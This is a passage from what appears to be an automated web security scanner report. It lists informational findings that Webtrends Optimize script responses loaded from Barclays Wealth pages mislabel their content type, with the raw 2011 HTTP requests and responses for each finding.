GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932043ee114; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; Expires=Sun, 01-Jan-2012 00:03:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.57. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200beff43; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 45071


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.58. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a4589da09c95ec229342c85e3f04cdbb16eb68a479511547be78c1f0ed28bf417fafde52976aa735f427b71fe8ad1715b035931319a897b9da02c6a51709fd25f0ace2d1ab125b84dc11d0f68db4aee0d9d318306ccb23066c323cb2576b76864311a0a6a78f826f1277675fc4bfaa881c308e9f4003895cb78e65bc2cd7f2a3a9db2ffe3c0c918a12d40e4da1faebc2c2f3e363ce6b956cb87449bb223c081afa8d2152643cc7c0db0256c63e1b01a4ee608554900b86d0eb0694234ae670572150bbe11cc6dc85be5a2b8a12c4cbdfac68ed45f933eff36ed2e70f4b20f295557ae5a5008cd9b80affb0b36b3ec9e4ee47402e1451ce8dba70a9cbb07aa7a481dc807e8d0526dd493a0850bd9a1a40b6c345ad0824ef71bc32f76c2512561f7fb08daf5ace9f5228557ba2262b6430be204cc1a18 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:08 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.59. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879ccaca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
